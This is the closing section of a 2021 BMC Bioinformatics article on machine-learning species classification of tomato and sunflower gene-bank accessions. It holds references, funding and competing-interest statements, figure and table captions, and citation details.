52. Peralta IE, Knapp S, Spooner DM. New species of wild tomatoes (Solanum section Lycopersicon: Solanaceae) from Northern Peru. Syst Bot. 2005 Apr 1;30(2):424–34.
53. Peralta IE, Spooner DM, Knapp S. Taxonomy of wild tomatoes and their relatives (Solanum sect. Lycopersicoides, sect. Juglandifolia, sect. Lycopersicon; Solanaceae). Systematic Botany Monographs. 2008;84.
54. Rodriguez F, Wu F, Ané C, Tanksley S, Spooner DM. Do potatoes and tomatoes have a single evolutionary history, and what proportion of the genome supports this history? BMC Evol Biol. 2009 Dec;9(1):191.
55. Labate JA, Robertson LD, Strickler SR, Mueller LA. Genetic structure of the four wild tomato species in the Solanum peruvianum s.l. species complex. Genome. 2014 May 5;57(3):169–80.
56. Nakazato T, Warren DL, Moyle LC. Ecological and geographic modes of species divergence in wild tomatoes. Am J Bot. 2010 Apr;97(4):680–93.
57. Rish I. An empirical study of the naive Bayes classifier. In: IJCAI 2001 Workshop on Empirical Methods in Artificial Intelligence 2001 Aug 4 (Vol. 3, No.
22, pp. 41–46).
58. Baute GJ, Owens GL, Bock DG, Rieseberg LH. Genome-wide genotyping-by-sequencing data provide a high-resolution view of wild Helianthus diversity, genetic structure, and interspecies gene flow. Am J Bot. 2016 Dec;103(12):2170–7.
59. Knaus BJ, Grünwald NJ. vcfr: a package to manipulate and visualize variant call format data in R. Mol Ecol Resourc. 2017 Jan;17(1):44–53.
60. Obenchain V, Lawrence M, Carey V, Gogarten S, Shannon P, Morgan M. VariantAnnotation: a Bioconductor package for exploration and annotation of genetic variants. Bioinformatics. 2014 Mar 28;30(14):2076–8.
61. Pedersen BS, Quinlan AR. cyvcf2: fast, flexible variant analysis with Python. Bioinformatics. 2017 Jun 15.
62. Vinga S, Almeida J. Alignment-free sequence comparison—a review. Bioinformatics. 2003 Mar 1;19(4):513–23.
63. Leggett RM, MacLean D. Reference-free SNP detection: dealing with the data deluge. BMC Genomics. 2014 May;15(4):S10.
64. Melo AT, Bartaula R, Hale I. GBS-SNP-CROP: a reference-optional pipeline for SNP discovery and plant germplasm characterization using variable length, paired-end genotyping-by-sequencing data. BMC Bioinformatics. 2016 Dec;17(1):29.
65. Peterlongo P, Riou C, Drezen E, Lemaitre C. DiscoSnp++: de novo detection of small variants from raw unassembled read set(s). BioRxiv. 2017 Jan;1:209965.

Funding

This work was part of the Fundamental Research Programme 'Circular and Climate Neutral' (KB-34-013-001) and the "Innovations in PGR Collection Management" project (WOT-03 Genetic Resources), both funded by the Dutch Ministry of Agriculture, Nature and Food Quality. The funding bodies played no role in the design of the study, the collection, analysis, and interpretation of data, or the writing of the manuscript.

Ethics approval and consent to participate

Consent for publication

Competing interests

The authors declare that they have no competing interests.

Publisher's Note

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
Prediction accuracy per species and species representation. Classifiers are Random Forest (RF), Naive Bayes (NB), Neighbour-Joining (NJ), 1-Nearest Neighbour (1-NN), and 3-Nearest Neighbours (3-NN). The number of accessions per species is denoted by 'n'. The best performance for each dataset is presented in bold.

Neighbour-Joining tree of Helianthus species represented by 10 or more accessions. The number of divergent sites was used as a measure of distance. Potentially misclassified accessions (niv07, pet02, max148, and pet88) are marked by a black asterisk.

Random Forest outlier scores for all sunflower accessions. The dashed line represents the cut-off score used, which is 10.

Tomato reseq dataset and predictions. List of resequenced tomato accessions included in this study, their a priori classifications, and species predictions from all classifiers studied.

Sunflower dataset and predictions. List of sunflower accessions included in this study, their a priori classifications, and species predictions from all classifiers studied.

Tomato AFLP dataset and predictions. List of tomato AFLP accessions included in this study, their a priori classifications, and species predictions from all classifiers studied.

About this article

Cite this article

van Bemmelen van der Plaat, A., van Treuren, R. & van Hintum, T.J.L. Reliable genomic strategies for species classification of plant genetic resources. BMC Bioinformatics 22, 173 (2021). https://doi.org/10.1186/s12859-021-04018-6

- Plant genetic resources
- Species classification
- Machine learning
- Crop wild relatives
- Gene bank documentation